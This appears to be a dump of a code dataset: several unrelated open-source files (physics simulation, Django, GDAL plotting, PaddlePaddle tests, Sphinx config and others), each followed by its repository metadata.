self._compute_sweep_dt_tol(T, dt, tol, order)
# set up progress bar and start evolution
progbar = self.progbar if (progbar is None) else progbar
progbar = qu.utils.continuous_progbar(self.t, T) if progbar else None
while self.t < T - self.TARGET_TOL:
if (T - self.t < self._dt):
# set custom dt if within one step of final time
dt = T - self.t
# also make sure queued sweeps are drained
queue = False
else:
dt = None
queue = True
# perform a step!
self.step(order=order, progbar=progbar, dt=dt, queue=queue)
if progbar:
progbar.close()
def _set_progbar_desc(self, progbar):
msg = f"t={self.t:.4g}, max-bond={self._pt.max_bond()}"
progbar.set_description(msg)
def at_times(self, ts, dt=None, tol=None, order=4, progbar=None):
"""Generate the time evolved state at each time in ``ts``.
Parameters
----------
ts : sequence of float
The times to evolve to and yield the state at.
dt : float, optional
Time step to use. Can't be set as well as ``tol``.
tol : float, optional
Tolerance for whole evolution. Can't be set as well as ``dt``.
order : int, optional
Trotter order to use.
progbar : bool, optional
Manually turn the progress bar off.
Yields
------
pt : MatrixProductState
The state at each of the times in ``ts``. This is a copy of
internal state used, so inplace changes can be made to it.
"""
# convert ts to list, to to calc range and use progress bar
ts = sorted(ts)
T = ts[-1]
# need to use dt always so tol applies over whole T sweep
dt = self._compute_sweep_dt_tol(T, dt, tol, order)
# set up progress bar
progbar = self.progbar if (progbar is None) else progbar
if progbar:
ts = qu.utils.progbar(ts)
for t in ts:
self.update_to(t, dt=dt, tol=False, order=order, progbar=False)
if progbar:
self._set_progbar_desc(ts)
yield self.pt
def OTOC_local(psi0, H, H_back, ts, i, A, j=None, B=None,
initial_eigenstate='check', **tebd_opts):
""" The out-of-time-ordered correlator (OTOC) generating by two local
operator A and B acting on site 'i', note it's a function of time.
Parameters
----------
psi0 : MatrixProductState
The initial state in MPS form.
H : NNI
The Hamiltonian for forward time-evolution.
H_back : NNI
The Hamiltonian for backward time-evolution, should have only
sign difference with 'H'.
ts : sequence of float
The time to evolve to.
i : int
The site where the local operators acting on.
A : array
The operator to act with.
initial_eigenstate: {'check', Flase, True}
To check the psi0 is or not eigenstate of operator B. If psi0 is the
eigenstate of B, it will run a simpler version of OTOC calculation
automatically.
Returns
----------
The OTOC <A(t)B(0)A(t)B(0)>
"""
if B is None:
B = A
if j is None:
j = i
if initial_eigenstate == 'check':
psi = psi0.gate(B, j, contract=True)
x = psi0.H.expec(psi)
y = psi.H.expec(psi)
if abs(x**2 - y) < 1e-10:
initial_eigenstate = True
else:
initial_eigenstate = False
if initial_eigenstate is True:
tebd1 = TEBD(psi0, H, **tebd_opts)
x = psi0.H.expec(psi0.gate(B, j, contract=True))
for t in ts:
# evolve forward
tebd1.update_to(t)
# apply first A-gate
psi_t_A = tebd1.pt.gate(A, i, contract=True)
# evolve backwards
tebd2 = TEBD(psi_t_A, H_back, **tebd_opts)
tebd2.update_to(t)
# compute expectation with second B-gate
psi_f = tebd2.pt
yield x * psi_f.H.expec(psi_f.gate(B, j, contract=True))
else:
# set the initial TEBD and apply the first operator A to right
psi0_L = psi0
tebd1_L = TEBD(psi0_L, H, **tebd_opts)
psi0_R = psi0.gate(B, j, contract=True)
tebd1_R = TEBD(psi0_R, H, **tebd_opts)
for t in ts:
# evolve forward
tebd1_L.update_to(t)
tebd1_R.update_to(t)
# apply the opertor A to both left and right states
psi_t_L_A = tebd1_L.pt.gate(A, i, contract=True)
psi_t_R_A = tebd1_R.pt.gate(A.H, i, contract=True)
# set the second left and right TEBD
tebd2_L = TEBD(psi_t_L_A, H_back, **tebd_opts)
tebd2_R = TEBD(psi_t_R_A, H_back, **tebd_opts)
# evolve backwards
tebd2_L.update_to(t)
tebd2_R.update_to(t)
# apply the laste operator B to left and compute overlap
psi_f_L = tebd2_L.pt.gate(B.H, j, contract=True)
psi_f_R = tebd2_R.pt
yield psi_f_L.H.expec(psi_f_R)
|
jcmgray/quijy
|
quimb/tensor/tensor_tebd.py
|
Python
|
mit
| 20,340 | 0 |
import sys
if sys.platform.startswith('win32'):
import win32gui
GetForegroundWindow = win32gui.GetForegroundWindow
SetForegroundWindow = win32gui.SetForegroundWindow
elif sys.platform.startswith('darwin'):
from Foundation import NSAppleScript
def GetForegroundWindow():
return NSAppleScript.alloc().initWithSource_("""
tell application "System Events"
return unix id of first process whose frontmost = true
end tell""").executeAndReturnError_(None)[0].int32Value()
def SetForegroundWindow(pid):
NSAppleScript.alloc().initWithSource_("""
tell application "System Events"
set the frontmost of first process whose unix id is %d to true
end tell""" % pid).executeAndReturnError_(None)
elif sys.platform.startswith('linux'):
from subprocess import call, check_output, CalledProcessError
def GetForegroundWindow():
try:
output = check_output(['xprop', '-root', '_NET_ACTIVE_WINDOW'])
return int(output.split()[-1], 16)
except CalledProcessError:
return None
def SetForegroundWindow(w):
"""Returns focus to previous application."""
try:
call(['wmctrl', '-i', '-a', str(w)])
except CalledProcessError:
pass
|
Germanika/plover
|
plover/oslayer/wmctrl.py
|
Python
|
gpl-2.0
| 1,274 | 0 |
#!/usr/bin/env python
#/******************************************************************************
# * $Id$
# *
# * Project: GDAL Make Histogram and Cumulative graph from Tab delimited tab as
# generated by gdal_hist.py
# * Purpose: Take a gdal_hist.py output and create a histogram plot using matplotlib
# * Author: Trent Hare, thare@usgs.gov
# *
# ******************************************************************************
# * Public domain licenes (unlicense)
# *
# * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# * OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# * DEALINGS IN THE SOFTWARE.
# ****************************************************************************/
import sys
import os
import math
import numpy as np
import pandas as pd
from pandas.tools.plotting import table
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
def usage():
print 'Usage: slope_histogram_cumulative_graph.py -name "InSight E1" slope_histogram_table.tab outfile.png'
print " This program is geared to run on a table as generated by gdal_hist.py"
print 'slope_histogram_cumulative_graph.py -name "E_Marg_CE 01" DEM_1m_E_Marg_CE_adir_1m_hist.xls DEM_1m_E_Marg_CE_adir_1m_hist.png'
sys.exit(0)
#set None for commandline options
name = ""
infile = None
outfile = None
# =============================================================================
# Parse command line arguments.
# =============================================================================
i = 1
while i < len(sys.argv):
arg = sys.argv[i]
if arg == '-name':
i = i + 1
name = sys.argv[i]
elif infile is None:
infile = arg
elif outfile is None:
outfile = arg
else:
Usage()
i = i + 1
if infile is None:
usage()
if not(os.path.isfile(infile)):
input = sys.argv[1]
print "filename %s does not exist." % (infile)
sys.exit(1)
#load table
df = pd.DataFrame.from_csv(infile, sep='\t', header=1)
#initialize figure
fig, ax1 = plt.subplots()
#calculate unscaled values
#df.value = (df.value * 5) - 0.2
#df.ix[df.value < 0] = 0; df
#not to reverse histogram before calculating 'approx' stats
#min = round(df.value.min(),2)
#max = round(df.value.max(),2)
#mean = round(df.value.mean(),2)
#stddev = round(df.value.std(),2)
#rms = round(math.sqrt((mean * mean) + (stddev * stddev)),2)
#statsDict = {'Min':min,'Max':max,'Mean':mean \
#,'StdDev':stddev,'RMS':rms}
#statsSeries = pd.Series(statsDict,name='stats')
#statsSeries.sort()
#t = table(ax1, statsSeries, \
#loc='lower right', colWidths=[0.1] * 2)
#t.set_fontsize(18)
#props = t.properties()
#cells = props['child_artists']
#for c in cells:
#c.set_height(0.05)
#Plot frequency histogram from input table
ax1.fill(df.value,df['count'],'gray')
#df.plot(ax1=ax1, kind='area', color='gray', legend=True)
ax1.ticklabel_format(style='sci', axis='y', scilimits=(0,0))
ax1.get_yaxis().set_tick_params(direction='out')
#get min and max as found by pandas for plotting 'arrow' at X=15
#minY = round(df['count'].min(),0)
#maxY = round(df['count'].max(),0)
#grab existing ax1 axes
#ax = plt.axes()
#ax.arrow(15, minY, 0, maxY, head_width=0, head_length=0, fc='k', ec='k')
ax1.axvline(x=15, color='black', alpha=0.5)
#add cumulative plot on 'Y2' axis using save X axes
ax2 = ax1.twinx()
ax2.plot(df.value,df['cumulative'],'blue')
#df.plot(ax2=ax2, df.value,df['cumulative'],'blue')
ax2.get_yaxis().set_tick_params(direction='out')
#define labels
ax1.set_xlabel('Slope (degrees)')
ax1.set_ylabel('Count')
ax2.set_ylabel('Cumulative')
plt.suptitle(name + ' Slope Histogram and Cumulative Plot')
#save out PNG
plt.savefig(outfile)
print "Graph exported to %s" % (outfile)
|
USGS-Astrogeology/GDAL_scripts
|
gdal_baseline_slope/python2/slope_histogram_cumulative_graph.py
|
Python
|
unlicense
| 4,103 | 0.013892 |
# -*- coding: utf-8 -*-
'''
Pupil Player Third Party Plugins by cpicanco
Copyright (C) 2016 Rafael Picanço.
The present file is distributed under the terms of the GNU General Public License (GPL v3.0).
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import cv2
from pyglui import ui
from plugin import Plugin
blue, green, red = 0, 1, 2
class Filter_Opencv_Threshold(Plugin):
"""
Apply cv2.threshold in each channel of the (world) frame.img
"""
uniqueness = "not_unique"
def __init__(self, g_pool, threshold=177, thresh_mode="BINARY", otsu=False):
super(Filter_Opencv_Threshold, self).__init__(g_pool)
# run before all plugins
# self.order = .1
# run after all plugins
self.order = .99
# initialize empty menu
self.menu = None
# filter properties
self.threshold = threshold
self.thresh_mode = thresh_mode
self.otsu = otsu
def update(self,frame,events):
# thresh_mode
if self.thresh_mode == "NONE":
return
if self.thresh_mode == "BINARY":
cv2_thresh_mode = cv2.THRESH_BINARY
if self.thresh_mode == "BINARY_INV":
cv2_thresh_mode = cv2.THRESH_BINARY_INV
if self.thresh_mode == "TRUNC":
cv2_thresh_mode = cv2.THRESH_TRUNC
if self.thresh_mode == "TOZERO":
cv2_thresh_mode = cv2.THRESH_TOZERO
if self.otsu:
cv2_thresh_mode = cv2_thresh_mode + cv2.THRESH_OTSU
# apply the threshold to each channel
for i, channel in enumerate((frame.img[:,:,blue], frame.img[:,:,green], frame.img[:,:,red])):
retval, edg = cv2.threshold(channel, self.threshold, 255, cv2_thresh_mode)
frame.img[:,:,i] = edg
def init_gui(self):
# initialize the menu
self.menu = ui.Scrolling_Menu('Threshold')
# add menu to the window
self.g_pool.gui.append(self.menu)
# append elements to the menu
self.menu.append(ui.Button('remove',self.unset_alive))
self.menu.append(ui.Info_Text('Filter Properties'))
self.menu.append(ui.Selector('thresh_mode',self,label='Thresh Mode',selection=["NONE","BINARY","BINARY_INV", "TRUNC","TOZERO"] ))
self.menu.append(ui.Switch('otsu',self,label='Otsu'))
self.menu.append(ui.Slider('threshold',self,min=0,step=1,max=255,label='Threshold'))
def deinit_gui(self):
if self.menu:
self.g_pool.gui.remove(self.menu)
self.menu = None
def unset_alive(self):
self.alive = False
def get_init_dict(self):
# persistent properties throughout sessions
return {'threshold':self.threshold, 'thresh_mode':self.thresh_mode, 'otsu':self.otsu}
def cleanup(self):
""" called when the plugin gets terminated.
This happens either voluntarily or forced.
if you have a GUI or glfw window destroy it here.
"""
self.deinit_gui()
|
cpicanco/player_plugins
|
filter_opencv_threshold.py
|
Python
|
gpl-3.0
| 3,093 | 0.012937 |
import antlr3;
import sqlite3;
import pickle;
import sys, os;
import re;
from SpeakPython.SpeakPython import SpeakPython;
from SpeakPython.SpeakPythonLexer import SpeakPythonLexer;
from SpeakPython.SpeakPythonParser import SpeakPythonParser;
#sort results based on length of labels
def sortResults(results):
l = len(results);
if l == 1 or l == 0:
return results;
s1 = sortResults(results[:l/2]);
s2 = sortResults(results[l/2:]);
res = [];
si1 = 0;
si2 = 0;
sl1 = len(s1);
sl2 = len(s2);
max = sl1 + sl2;
for i in range(0, max):
if si1 == sl1:
res.extend(s2[si2:]);
break;
if si2 == sl2:
res.extend(s1[si1:]);
break;
if len(s1[si1].labels) > len(s2[si2].labels):
res.append( s1[si1] );
si1 += 1;
else:
res.append( s2[si2] );
si2 += 1;
return res;
def makeDB(conn):
c = conn.cursor();
try:
c.execute("DROP TABLE matches");
c.execute("DROP TABLE functions");
c.execute("DROP TABLE kleene")
conn.commit();
except Exception as e:
conn.rollback();
c.execute("CREATE TABLE matches (order_id INTEGER PRIMARY KEY, keywords TEXT, regex TEXT, results BLOB)");
c.execute("CREATE TABLE functions (name TEXT, regex TEXT, results BLOB)");
c.execute("CREATE TABLE kleene (id TEXT PRIMARY KEY, regexes BLOB)");
#index the keywords to speed up text search
c.execute("CREATE INDEX IF NOT EXISTS keyword_idx ON matches (keywords)");
c.execute("CREATE INDEX IF NOT EXISTS func_name_idx ON functions (name)");
conn.commit();
def performTestCases(exp, testCases):
print "Testing: ", exp
for t in testCases:
m = re.match(exp, t);
if m == None:
print "Test case failed: ", t;
return False;
return True;
def insertIntoDB(conn, matches, functions):
matchEntries = [];
kleeneEntries = [];
funcEntries = [];
print "Running test cases for matches...";
idCount = 0;
for m in matches:
#perform in-suite test cases
succeededTests = performTestCases(m.exp, m.testCases);
if not succeededTests:
return;
k = ','.join(m.keywords);
m.results = sortResults(m.results);
if len(m.kGroupRegexes) > 0:
kleeneEntries.append((str(idCount), pickle.dumps(m.kGroupRegexes)));
matchEntries.append((idCount, k, m.exp, pickle.dumps(m.results)));
idCount += 1;
print "All match test cases passed.";
c = conn.cursor();
c.executemany("INSERT INTO matches VALUES (?,?,?,?)", matchEntries);
conn.commit();
print "Running test cases for functions...";
for f in functions:
f = functions[f];
#perform in-suite test cases
succeededTests = performTestCases(f, f.testCases);
if not succeededTests:
return;
#save all regex groups in database under function name
if len(f.kGroupRegexes) > 0:
kleeneEntries.append((f.getName(), pickle.dumps(f.kGroupRegexes)));
f.results = sortResults(f.results);
funcEntries.append((f.getName(), f.getExp(), pickle.dumps(f.getResults())));
print "All function test cases passed";
c.executemany("INSERT INTO functions VALUES (?,?,?)", funcEntries);
c.executemany("INSERT INTO kleene VALUES (?,?)", kleeneEntries);
conn.commit();
print "Functions:";
for row in c.execute("SELECT * FROM functions"):
print row, '\n';
print "\n";
print "Matches:";
for row in c.execute("SELECT * FROM matches"):
print row, '\n';
print "\n";
print "Kleene:";
for row in c.execute("SELECT * FROM kleene"):
print row, '\n';
print "\n";
conn.close();
def parse(conn, fileList, dirName):
parser = None;
otherGlobalTests = {};
for f in fileList:
#join filename with current directory path
fileName = os.path.join(dirName, f);
#if f is a file, parse and insert into db
if os.path.isfile(fileName):
char_stream = antlr3.ANTLRFileStream(fileName);
lexer = SpeakPythonLexer(char_stream);
tokens = antlr3.CommonTokenStream(lexer);
# for t in lexer:
# print t;
parser = SpeakPythonParser(tokens);
parser.prog();
insertIntoDB(conn, parser.matches, parser.aliases);
#if f is a dir, pass list of files into recursive call
if os.path.isdir(fileName):
subFiles = os.listdir(fileName);
otherGlobalTests = parse(conn, subFiles, fileName);
globalTests = {};
if parser == None:
print "Parser not defined."
else:
globalTests = parser.globalTests;
globalTests.update(otherGlobalTests);
return globalTests;
def main(argv):
name = argv[1] + '.db';
conn = sqlite3.connect(name);
makeDB(conn);
globalTests = parse(conn, [argv[2]], '');
for gt in globalTests:
sp = SpeakPython(name);
r = sp.matchResult(gt);
resultStr = '';
if r != None:
resultStr = r.getResult();
if resultStr != globalTests[gt]:
print "Value test case failed: (" + gt + ") does not return (" + globalTests[gt] + "), but instead returns (" + resultStr + ")";
main(sys.argv);
|
netgio/voicecount
|
devicecode/SpeakPythonMakeDB.py
|
Python
|
mit
| 4,765 | 0.057712 |
from distutils.core import setup
version = '1.1.1'
setup(name='CacheGenerator',
version=version,
description="CacheGenerator for Django",
author="Ricardo Santos",
author_email="ricardo@getgears.com",
url="http://github.com/ricardovice/CacheGenerator/",
packages = ['cachegenerator']
)
|
ricardovice/CacheGenerator
|
setup.py
|
Python
|
mit
| 329 | 0.006079 |
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import paddle
import paddle.distributed.fleet as fleet
import numpy as np
import paddle.nn as nn
from paddle.distributed.passes import new_pass, PassManager
import unittest
from dist_pass_test_base import DistPassTestBase
class BatchNormAddActNet(nn.Layer):
def __init__(self):
super(BatchNormAddActNet, self).__init__()
self.conv1 = nn.Conv2D(3, 8, (3, 3), data_format="NHWC")
self.conv2 = nn.Conv2D(3, 8, (3, 3), data_format="NHWC")
self.bn1 = nn.BatchNorm2D(8, data_format="NHWC")
self.bn2 = nn.BatchNorm2D(8, data_format="NHWC")
self.relu = nn.ReLU()
def forward(self, x):
y = self.conv1(x)
y = self.bn1(y)
out = self.conv2(x)
out = self.bn2(out) + y
out = self.relu(out)
out = paddle.flatten(out, 1)
return out
class TestFuseBatchNormAddActPass(DistPassTestBase):
def init(self):
self.atol = 1e-4
self.rtol = 1e-4
def get_model(self, place, batch_size=32, image_shape=[224, 224, 3]):
image = paddle.static.data(
shape=[batch_size] + image_shape, dtype='float32', name='image')
model = BatchNormAddActNet()
pred_out = model(image)
loss = paddle.mean(pred_out)
optimizer = paddle.optimizer.Adam(learning_rate=1e-3)
dist_strategy = fleet.DistributedStrategy()
dist_strategy.fuse_all_reduce_ops = False
dist_strategy.without_graph_optimization = True
dist_strategy.amp = True
dist_strategy.amp_configs = {
"init_loss_scaling": 32768,
"use_dynamic_loss_scaling": True,
}
fleet.init(is_collective=True, strategy=dist_strategy)
optimizer = fleet.distributed_optimizer(optimizer)
optimizer.minimize(loss)
rank = paddle.distributed.get_rank()
def reader():
seed = int(os.environ.get("SEED", 0))
np.random.seed(seed + rank)
for _ in range(10):
image_np = np.random.random(size=image.shape).astype('float32')
yield image_np,
main_program = paddle.static.default_main_program()
startup_program = paddle.static.default_startup_program()
return main_program, startup_program, [image], [loss], reader
def apply_passes(self, main_prog, startup_prog):
pass_manager = PassManager([new_pass("fuse_bn_add_act")])
pass_manager.apply([main_prog], [startup_prog])
print(pass_manager.names)
op_type = []
for op in main_prog.global_block().ops:
op_type.append(op.type)
self.assertTrue("fused_bn_add_activation" in op_type)
self.assertTrue("fused_bn_add_activation_grad" in op_type)
def test_fuse_bn_add_act(self):
self.check_main()
if __name__ == "__main__":
unittest.main()
|
luotao1/Paddle
|
python/paddle/fluid/tests/unittests/distributed_passes/test_dist_fuse_bn_add_act_pass.py
|
Python
|
apache-2.0
| 3,476 | 0.000863 |
from django.conf.urls import patterns, include, url
from django.conf import settings
# Here, user contacts.profile will cause some 'mismatch' since contacts is also a module
from profile import ProfileView
from contacts import ContactsView
from authen import Authenticate
strid = settings.CONTACT_URL['strid']
user = settings.CONTACT_URL['user']
contact = settings.CONTACT_URL['contact']
auth = settings.CONTACT_URL['auth']
urlpatterns = patterns('',
url(r'^api/'+auth+'$', Authenticate.as_view()),
url(r'^api/(?P<'+strid+r'>\w{16})/$', ProfileView.as_view()),
url(r'^api/(?P<'+strid+r'>\w{16})/(?P<'+contact+r'>\d+)/$', ContactsView.as_view()),
url(r'^(?P<'+user+r'>\w{5,18})/(?P<'+strid+r'>\w{16})/$', ProfileView.as_view()),
url(r'^(?P<'+user+r'>\w{5,18})/(?P<'+strid+r'>\w{16})/(?P<'+contact+r'>\d+)/$', ContactsView.as_view()),
)
|
sharehub/DBRest
|
dbrest/contacts/urls.py
|
Python
|
mit
| 858 | 0.005828 |
import sys
from django.core.management.base import BaseCommand, CommandError
import nflgame
from terminaltables import AsciiTable
from ...models import Player, Team, Season, Week, WeeklyStats
class Command(BaseCommand):
help = 'takes option position, displays top players as table'
def add_arguments(self, parser):
# Named (optional) arguments
parser.add_argument('position', nargs=1)
def handle(self, *args, **options):
p = options['position']
if p:
Player.show_top_players(position=p[0])
else:
Player.show_top_players()
|
johnshiver/football_tools
|
football/core/management/commands/show_top_players.py
|
Python
|
mit
| 607 | 0.001647 |
# -*- coding: utf-8 -*-
# Copyright (c) 2010 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Keystone documentation build configuration file, created by
# sphinx-quickstart on Tue May 18 13:50:15 2010.
#
# This file is execfile()'d with the current directory set to it's containing
# dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
ROOT_DIR = os.path.abspath(os.path.join(BASE_DIR, "..", ".."))
sys.path.insert(0, ROOT_DIR)
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.coverage',
'sphinx.ext.ifconfig',
'sphinx.ext.graphviz',
'sphinx.ext.todo',
'oslo_config.sphinxext',
'oslo_config.sphinxconfiggen',
'oslo_policy.sphinxext',
'oslo_policy.sphinxpolicygen',
'openstackdocstheme',]
todo_include_todos = True
# Add any paths that contain templates here, relative to this directory.
templates_path = []
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master doctree document.
master_doc = 'index'
# General information about the project.
project = u'Neutron VPNaaS'
copyright = u'2011-present, OpenStack Foundation.'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
# unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = []
# The reST default role (for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'native'
# A list of ignored prefixes for module index sorting.
modindex_common_prefix = ['neutron_vpnaas.']
# -- Options for man page output --------------------------------------------
# Grouping the document tree for man pages.
# List of tuples 'sourcefile', 'target', u'title', u'Authors name', 'manual'
#man_pages = [
# ('man/neutron-server', 'neutron-server', u'Neutron Server',
# [u'OpenStack'], 1)
#]
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
# html_theme = '_theme'
html_theme = 'openstackdocs'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = ['_theme']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
#htmlhelp_basename = 'neutrondoc'
# -- Options for LaTeX output ------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author,
# documentclass [howto/manual]).
latex_documents = [
('index', 'doc-neutron-vpnaas.tex', u'Neutron VPN-as-a-Service Documentation',
u'Neutron development team', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
# Disable usage of xindy https://bugzilla.redhat.com/show_bug.cgi?id=1643664
latex_use_xindy = False
latex_domain_indices = False
latex_elements = {
'extraclassoptions': 'openany,oneside',
'makeindex': '',
'printindex': '',
'preamble': r'\setcounter{tocdepth}{3}',
}
# -- Options for openstackdocstheme -------------------------------------------
openstackdocs_repo_name = 'openstack/neutron-vpnaas'
openstackdocs_pdf_link = True
openstackdocs_auto_name = False
openstackdocs_bug_project = 'neutron'
openstackdocs_bug_tag = 'doc'
# -- Options for oslo_config.sphinxconfiggen ---------------------------------
_config_generator_config_files = [
'vpn_agent.ini',
'neutron_vpnaas.conf',
]
def _get_config_generator_config_definition(conf):
config_file_path = '../../etc/oslo-config-generator/%s' % conf
# oslo_config.sphinxconfiggen appends '.conf.sample' to the filename,
# strip file extentension (.conf or .ini).
output_file_path = '_static/config_samples/%s' % conf.rsplit('.', 1)[0]
return (config_file_path, output_file_path)
config_generator_config_file = [
_get_config_generator_config_definition(conf)
for conf in _config_generator_config_files
]
# -- Options for oslo_policy.sphinxpolicygen ---------------------------------
policy_generator_config_file = '../../etc/oslo-policy-generator/policy.conf'
sample_policy_basename = '_static/neutron-vpnaas'
|
openstack/neutron-vpnaas
|
doc/source/conf.py
|
Python
|
apache-2.0
| 8,813 | 0.003858 |
# -*- coding: utf8 -*-
import logging
import math
from Graphx import graphx
from GameEngine.GameObjects.gameObjectBehaviour import GameObjectBehaviour
from Brains.human import HumanBrain
from conf import conf
class CarBehaviour(GameObjectBehaviour):
brainTypes = {
'human': HumanBrain
}
"""
Behaviour of the car. It handles the car at its current position.
"""
def __init__(self, brainType, ruleChecker, model):
"""
Initialize a new Behaviour object for the car.
It needs a brain which will take the actual decisions of the actions,
and the model that holds the state history
"""
super(CarBehaviour, self).__init__(model)
self._brain = CarBehaviour.brainTypes[brainType](model)
self._ruleChecker = ruleChecker
self._newVelocity = None
self._newPosition = None
self._newHeading = None
self._actions = {
'accelerate': self.accelerate,
'break': self.breaks,
'turnRight': self.turnRight,
'turnLeft': self.turnLeft,
'halt': self.halt
}
def move(self):
"""
set the new position of the car using the current velocity and
the current heading
"""
self._newPosition = \
(self._model.position[0] +
self._newVelocity * self._model.headingVector[0],
self._model.position[1] +
self._newVelocity * self._model.headingVector[1])
def halt(self):
"""
If this action is called at this turn, the velocity and the heading
stay the same
"""
self._newVelocity = self._model.velocity
self._newHeading = self._model.headingAngle
self.move()
def accelerate(self):
"""
Increase the velocity by the car's acceleration
If max_speed is reached, the car simply keep its current speed.
The heading does not change
"""
self._newVelocity = \
self._model.velocity + self._model.constant('acceleration')
if self._newVelocity > self._model.constant('max_speed'):
self._newVelocity = self._model.constant('max_speed')
self._newHeading = self._model.headingAngle
self.move()
def breaks(self):
"""
Breaks using the car's break constant.
If the car is already stopped, nothing happen.
The heading does not change
"""
self._newVelocity = \
self._model.velocity - self._model.constant('break')
if self._newVelocity < 0:
self._newVelocity = 0
self._newHeading = self._model.headingAngle
self.move()
def turnRight(self):
"""
Turn right relatively to the car's heading using the car's maniability.
The velocity does not change
"""
self._newHeading = self._model.headingAngle - \
self._model.constant('maniability')
self._newVelocity = self._model.velocity
self.move()
def turnLeft(self):
"""
Turn left relatively to the car's heading using the car's maniability
The velocity does not change
"""
self._newHeading = self._model.headingAngle + \
self._model.constant('maniability')
self._newVelocity = self._model.velocity
self.move()
def update(self, stateManager):
"""
Use the brain the take the decision about what is the next action, then
update the model according to what has been decided.
"""
decision = self._brain.decision()
self._actions[decision]()
self._model.rotate(self._newHeading)
self._model.velocity = self._newVelocity
self._model.position = self._newPosition
# self._ruleChecker.check(self._model.getCurrentState(),
# self._model.getPreviousState())
|
Hiestaa/cognitive-racer
|
GameEngine/GameObjects/Car/behaviour.py
|
Python
|
lgpl-3.0
| 3,344 | 0.031998 |
#!/usr/bin/env python3
# Given a root node reference of a BST and a key, delete the node with the given key in the BST. Return the root node reference (possibly updated) of the BST.
# Basically, the deletion can be divided into two stages:
# Search for a node to remove.
# If the node is found, delete the node.
# Note: Time complexity should be O(height of tree).
# Example:
# root = [5,3,6,2,4,null,7]
# key = 3
# 5
